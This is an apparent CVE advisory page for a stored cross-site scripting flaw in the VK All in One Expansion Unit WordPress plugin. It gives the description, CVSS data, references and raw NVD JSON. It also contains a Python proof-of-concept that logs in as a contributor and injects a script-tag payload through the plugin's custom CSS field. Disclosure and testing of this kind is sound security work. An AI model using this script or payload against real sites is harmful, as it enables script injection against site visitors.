CVE-2025-11267

Description

The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_veu_custom_css' parameter in all versions up to, and including, 9.112.1. This is due to insufficient input sanitization and output escaping on the user-supplied Custom CSS value. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

VK All in One Expansion Unit <= 9.112.1（所有版本直至并包括9.112.1）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-11267 PoC - Stored XSS in VK All in One Expansion Unit
# Target: WordPress site with VK All in One Expansion Unit plugin <= 9.112.1
# Authentication: Requires Contributor-level account

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "contributor_user"
PASSWORD = "contributor_password"

def login_wp():
    """Login to WordPress and get authentication cookies"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/",
        'testcookie': '1'
    }
    resp = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' in str(session.cookies):
        return session
    return None

def exploit_stored_xss(session):
    """Inject malicious JavaScript via _veu_custom_css parameter"""
    # XSS payload - executes alert on page load
    xss_payload = '</style><script>alert(document.domain)</script><style>'
    
    # Target: Plugin's Custom CSS functionality
    post_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    # Create/update a post with malicious CSS
    post_data = {
        'action': 'veu_custom_css_save',
        '_veu_custom_css': xss_payload,
        'post_id': '1',
        'nonce': 'your_valid_nonce_here'  # Need valid nonce from page
    }
    
    resp = session.post(post_url, data=post_data)
    print(f"[*] Response: {resp.status_code}")
    print(f"[*] Payload injected: {xss_payload}")
    return True

if __name__ == "__main__":
    print("[*] CVE-2025-11267 PoC - VK All in One Expansion Unit Stored XSS")
    session = login_wp()
    if session:
        print("[+] Login successful")
        exploit_stored_xss(session)
        print("[+] XSS payload injected. Visit any page to trigger.")
    else:
        print("[-] Login failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11267
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11267
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11267/
[4] VulDB https://vuldb.com/cve/CVE-2025-11267
[5] https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/admin/class-veu-metabox.php#L178
[6] https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/css-customize/css-customize-single.php#L32
[7] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3393317%40vk-all-in-one-expansion-unit%2Ftrunk&old=3385606%40vk-all-in-one-expansion-unit%2Ftrunk&sfp_email=&sfph_mail=
[8] https://www.wordfence.com/threat-intel/vulnerabilities/id/8996a0f0-8a49-4310-917b-62172c12afdb?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11267", "sourceIdentifier": "[email protected]", "published": "2025-11-18T08:15:50.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_veu_custom_css' parameter in all versions up to, and including, 9.112.1. This is due to insufficient input sanitization and output escaping on the user-supplied Custom CSS value. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/admin/class-veu-metabox.php#L178", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/vk-all-in-one-expansion-unit/tags/9.112.0.1/inc/css-customize/css-customize-single.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3393317%40vk-all-in-one-expansion-unit%2Ftrunk&old=3385606%40vk-all-in-one-expansion-unit%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8996a0f0-8a49-4310-917b-62172c12afdb?source=cve", "source": "[email protected]"}]}}